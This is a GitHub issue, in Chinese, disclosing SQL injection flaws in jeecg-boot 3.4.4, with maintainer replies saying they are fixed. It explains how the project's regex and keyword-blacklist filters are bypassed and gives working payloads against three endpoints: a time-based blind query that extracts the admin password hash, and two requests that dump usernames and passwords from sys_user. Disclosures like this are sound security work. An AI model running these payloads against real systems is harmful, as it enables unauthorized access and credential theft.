Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

jeecg-boot3.4.4 存在sql注入漏洞 #4393

Closed
Zer0Bs opened this issue Dec 10, 2022 · 2 comments
Closed

jeecg-boot3.4.4 存在sql注入漏洞 #4393

Zer0Bs opened this issue Dec 10, 2022 · 2 comments

Comments

@Zer0Bs
Copy link

Zer0Bs commented Dec 10, 2022

版本号:3.4.4
前端版本:vue2版
问题描述:sql注入检测代码存在绕过.
截图&代码:

SqlInjectionUtil类中sql的注释正则为

private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");

.无法匹配到%0A, 导致可以利用/*%0A*/绕过
关键字检测后存在空格,导致绕过

private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";

AbstractQueryBlackListHandler类中的黑名单:

ruleMap.put("sys_user", "password,salt");

在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用sys_user, (sys_user), sys_user%20等绕过

存在多个注入点:

  1. /sys/duplicate/check接口:
dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log

image

  1. /sys/api/getDictItems
    该接口没有进行签名校验:

image

?dictCode=sys_user%20,username,password

image

  1. sys/dict/queryTableData
?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password

image

友情提示(为了提高issue处理效率):

  • 未按格式要求发帖,会被直接删掉;
  • 描述过于简单或模糊,导致无法处理的,会被直接删掉;
  • 请自己初判问题描述是否清楚,是否方便我们调查处理;
  • 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
@tygithub1
Copy link

/%0A/,sys_user, (sys_user), sys_user%20,%60sys_user%60等问题已修改

/sys/api/getDictItems 该接口用于微服务间调用,未设置签名校验,如使用微服务,可以在网关的filter里将/sys/api/的接口调用禁掉

@zhangdaiscott
Copy link
Member

已修复

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants